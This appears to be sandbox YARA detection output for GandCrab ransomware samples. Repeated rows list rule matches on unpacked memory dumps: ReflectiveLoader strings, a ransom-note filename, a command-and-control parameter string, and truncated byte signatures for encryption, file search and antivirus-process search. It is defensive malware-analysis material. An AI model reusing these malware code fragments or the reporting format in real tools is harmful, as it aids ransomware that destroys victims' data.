12.3.wzltxa.exe.3b20000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
12.3.wzltxa.exe.3b20000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
12.3.wzltxa.exe.3b20000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
12.3.wzltxa.exe.3b20000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
12.3.wzltxa.exe.3b20000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
31.0.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
31.0.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
31.0.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
31.0.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
31.0.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
31.0.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
40.2.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
40.2.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
40.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
40.2.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
40.2.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
40.2.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
33.3.wzltxa.exe.2f00000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
33.3.wzltxa.exe.2f00000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
33.3.wzltxa.exe.2f00000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
33.3.wzltxa.exe.2f00000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
33.3.wzltxa.exe.2f00000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
33.3.wzltxa.exe.2f00000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
13.3.wzltxa.exe.3270000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
13.3.wzltxa.exe.3270000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
13.3.wzltxa.exe.3270000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
13.3.wzltxa.exe.3270000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
13.3.wzltxa.exe.3270000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
13.3.wzltxa.exe.3270000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
18.3.wzltxa.exe.3a80000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
18.3.wzltxa.exe.3a80000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
18.3.wzltxa.exe.3a80000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
18.3.wzltxa.exe.3a80000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
18.3.wzltxa.exe.3a80000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
18.3.wzltxa.exe.3a80000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
11.3.wzltxa.exe.3940000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
11.3.wzltxa.exe.3940000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
11.3.wzltxa.exe.3940000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
11.3.wzltxa.exe.3940000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
11.3.wzltxa.exe.3940000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
11.3.wzltxa.exe.3940000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
34.2.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
34.2.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
34.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
34.2.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
34.2.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
34.2.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
20.0.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
20.0.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
20.0.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
20.0.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
20.0.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
20.0.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
0.0.mPNVrHIpyt.exe.f690000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0.0.mPNVrHIpyt.exe.f690000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0.0.mPNVrHIpyt.exe.f690000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.0.mPNVrHIpyt.exe.f690000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0.0.mPNVrHIpyt.exe.f690000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0.0.mPNVrHIpyt.exe.f690000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 69 0F 8B 35 44 A1 69 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 69 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 69 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 69 0F 8B 35 10 A1 69 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 69 0F C7 44 24 1C 64 F4 69 0F C7 44 24 20 80 F4 69 0F C7 44 24 24 A0 F4 69 0F C7 44 24 28 BC F4 69 0F C7 44 24 2C D8 F4 69 0F C7 44 24 30 F0 F4 69 0F C7 44 24 34 04 F5 69 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 69 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 6A 0F C7 45 B8 BC 03 6A 0F C7 45 BC ...
27.2.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
27.2.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
27.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
27.2.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
27.2.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
27.2.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 